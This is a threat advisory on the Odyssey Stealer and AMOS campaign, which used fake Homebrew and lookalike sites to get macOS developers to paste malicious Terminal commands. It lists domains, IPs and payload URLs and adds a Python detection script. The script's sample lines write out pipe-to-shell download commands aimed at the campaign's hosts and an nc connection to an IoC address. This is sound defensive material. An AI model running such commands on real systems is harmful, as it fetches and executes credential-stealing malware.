Odyssey Stealer & AMOS Hit macOS Developers with Fake Homebrew Sites
A sophisticated malware campaign targets macOS developers by impersonating trusted platforms such as Homebrew, TradingView, and LogMeIn through over 85 phishing domains. Attackers use social engineering to trick users into pasting base64-encoded commands into the Terminal; once run, these commands download and execute Odyssey Stealer and AMOS malware. The malware attempts privilege escalation, performs anti-analysis checks, and disrupts backup services to maintain persistence and evade detection. The campaign infrastructure includes long-standing IP addresses and shared SSL certificates, indicating a well-established operation. This threat specifically targets developer environments on macOS, leveraging trust in popular developer tools. No CVSS score is available, but the threat is assessed as medium severity due to its targeted nature and complexity. European organizations with macOS developer workstations are at risk, especially in countries with high macOS adoption and active software development sectors. Mitigation requires user education, strict command execution policies, and network monitoring for suspicious domains and IPs.
AI Analysis
Technical Summary
This campaign involves a coordinated effort to distribute two malware families, Odyssey Stealer and AMOS, targeting macOS developers by exploiting their trust in widely used platforms like Homebrew, TradingView, and LogMeIn. Attackers create over 85 phishing domains that closely mimic legitimate sites, sharing SSL certificates and infrastructure to appear credible. The infection vector relies heavily on social engineering, where victims are persuaded to paste base64-encoded commands into the macOS Terminal. These commands download malicious payloads from attacker-controlled URLs such as bonoud.com. Once executed, the malware attempts to escalate privileges to gain deeper system access, conducts anti-analysis techniques to avoid sandboxing or forensic detection, and disrupts backup services to hinder recovery efforts. The campaign infrastructure includes IP addresses with multi-year activity, demonstrating persistence and adaptability. The malware leverages multiple MITRE ATT&CK techniques including T1056.001 (Input Capture), T1548.003 (Abuse Elevation Control Mechanism), T1204.002 (User Execution: Malicious File), and others related to credential access and defense evasion. The targeted nature of this campaign against macOS developers suggests a focus on stealing intellectual property, credentials, or sensitive development environment data. The absence of a CVSS score and the medium severity rating reflect the complexity and targeted scope rather than widespread impact. Indicators of compromise include specific domains and IP addresses linked to the campaign, which can be used for detection and blocking.
Potential Impact
European organizations employing macOS systems in development environments face risks including credential theft, intellectual property loss, and potential system compromise. The malware’s ability to escalate privileges and disrupt backup services increases the potential for significant operational disruption and data loss. Developers compromised by this campaign could inadvertently introduce vulnerabilities or malicious code into software supply chains, amplifying the threat beyond initial infection. The social engineering aspect exploits user trust, making technical controls alone insufficient without user awareness. Organizations with remote or hybrid workforces using macOS devices are particularly vulnerable. The persistence and anti-analysis capabilities of the malware complicate detection and remediation efforts, potentially leading to prolonged exposure. The campaign’s infrastructure reuse and long-term activity suggest a sustained threat that could evolve, posing ongoing risks to European software development ecosystems.
Mitigation Recommendations
1. Implement strict policies forbidding the execution of unverified commands in Terminal, especially those received via unsolicited communications or unknown websites.
2. Conduct targeted user awareness training for developers emphasizing the risks of social engineering and the dangers of executing base64-encoded commands from untrusted sources.
3. Deploy endpoint detection and response (EDR) solutions capable of detecting privilege escalation attempts, anti-analysis behaviors, and suspicious network connections to known malicious domains and IPs identified in this campaign.
4. Use DNS filtering and network security controls to block access to the identified phishing domains and associated IP addresses.
5. Enforce multi-factor authentication (MFA) for developer accounts and sensitive systems to reduce the impact of credential theft.
6. Regularly audit and monitor backup services to ensure they are operational and protected from tampering or disruption.
7. Maintain up-to-date macOS security patches and monitor for unusual system behaviors indicative of malware presence.
8. Encourage developers to verify software sources through official channels and avoid downloading tools or updates from unofficial or suspicious websites.
9. Integrate threat intelligence feeds containing indicators of compromise from this campaign into security monitoring tools for proactive detection.
10. Consider application whitelisting or restricting execution privileges for scripts and binaries in developer environments.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Denmark, Ireland
Indicators of Compromise
- ip: 195.82.147.38
- ip: 93.152.230.79
- url: https://bonoud.com/get3/install.sh
- url: https://bonoud.com/get6/update
- domain: bonoud.com
- domain: filmoraus.com
- domain: homebrewclubs.org
- domain: homebrewfaq.org
- domain: homebrewonline.org
- domain: homebrewupdate.org
- domain: logmeeine.com
- domain: logmeln.com
- domain: sites-phantom.com
- domain: tradingviewen.com
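Mitigation items 3, 4 and 9 above amount to one concrete detection task: run command-line telemetry (shell history, EDR process events) against the indicator list, and flag the "paste this into Terminal" pattern the campaign relies on, namely base64 text decoded and piped into a shell. The following script is an added example written for this page, not code from the advisory, AlienVault or hunt.io. It embeds the IoC domains and IPs listed above, decodes base64 blobs only to inspect them (never executes them), and also flags hosts that carry an impersonated brand name but are not on a defender-maintained allowlist, which goes beyond the fixed IoC list. The allowlist (LEGIT_DOMAINS), the brand tokens and every sample command line are assumptions constructed for the example.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Indicators copied from this advisory's IoC list.
IOC_DOMAINS = {
    "bonoud.com", "filmoraus.com", "homebrewclubs.org", "homebrewfaq.org",
    "homebrewonline.org", "homebrewupdate.org", "logmeeine.com", "logmeln.com",
    "sites-phantom.com", "tradingviewen.com",
}
IOC_IPS = {"195.82.147.38", "93.152.230.79"}

# Assumption: a defender-maintained allowlist of the real domains behind the
# impersonated brands, plus the brand strings a lookalike host would reuse.
LEGIT_DOMAINS = {"brew.sh", "githubusercontent.com", "github.com",
                 "tradingview.com", "logmein.com"}
BRAND_TOKENS = ("homebrew", "tradingview", "logme")

DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
B64_DECODE_RE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
PIPE_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/)?(?:sh|bash|zsh)\b")
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


@dataclass
class Finding:
    line: str
    reasons: List[str] = field(default_factory=list)


def registrable(host: str) -> str:
    """Reduce a hostname to its last two labels so subdomains match the IoC list."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def decode_blobs(text: str) -> List[str]:
    """Decode long base64-looking tokens for inspection only; binary junk is dropped."""
    decoded = []
    for blob in B64_BLOB_RE.findall(text):
        try:
            s = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\n\t" for c in s):
            decoded.append(s)
    return decoded


def inspect_command(line: str) -> Optional[Finding]:
    """Return a Finding if the command line matches the campaign's tradecraft or IoCs."""
    reasons: List[str] = []
    if B64_DECODE_RE.search(line) and PIPE_SHELL_RE.search(line):
        reasons.append("base64-decoded data piped into a shell")
    elif FETCH_RE.search(line) and PIPE_SHELL_RE.search(line):
        reasons.append("remote download piped into a shell")
    seen = set()
    # Check the visible line and anything hidden inside base64 blobs.
    for text in [line] + decode_blobs(line):
        for host in DOMAIN_RE.findall(text):
            dom = registrable(host)
            if dom in seen:
                continue
            seen.add(dom)
            if dom in IOC_DOMAINS:
                reasons.append(f"known IoC domain: {dom}")
            elif any(t in dom for t in BRAND_TOKENS) and dom not in LEGIT_DOMAINS:
                reasons.append(f"lookalike of an impersonated brand: {dom}")
        for ip in IP_RE.findall(text):
            if ip in IOC_IPS and ip not in seen:
                seen.add(ip)
                reasons.append(f"known IoC address: {ip}")
    return Finding(line, reasons) if reasons else None


def scan(lines: List[str]) -> List[Finding]:
    return [f for f in (inspect_command(l) for l in lines) if f]


# Constructed sample telemetry. The encoded command references the advisory's
# own IoC URL; the remaining lines are made up for the example.
_DECODED = "curl -fsSL https://bonoud.com/get3/install.sh -o /tmp/x"
_BLOB = base64.b64encode(_DECODED.encode()).decode()
SAMPLE_LINES = [
    "brew install wget",
    f"echo {_BLOB} | base64 -d | bash",
    "curl -fsSL https://homebrewupdate.org/install | sh",
    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    "nc 93.152.230.79 443",
    "ssh deploy@logmeln.com",
    "curl https://homebrew-installer.example/x | zsh",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f.line[:60], "->", "; ".join(f.reasons))
```

Only five of the seven sample lines produce findings: the plain `brew install` and the genuine Homebrew installer command (a `$(...)` substitution from `raw.githubusercontent.com`, not a pipe into a shell) pass clean, which is the point of allowlisting the real hosts rather than alerting on every mention of the brand.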
Technical Details
- Author: AlienVault
- TLP: white
- References: https://hunt.io/blog/macos-odyssey-amos-malware-campaign
- Adversary: null
- Pulse Id: 68f130fdef3c6aab4fcab821
- Threat Score: null
Threat ID: 68f163919f8a5dbaea0bfe82
Added to database: 10/16/2025, 9:28:49 PM
Last enriched: 10/16/2025, 9:44:46 PM
Last updated: 10/17/2025, 10:33:02 PM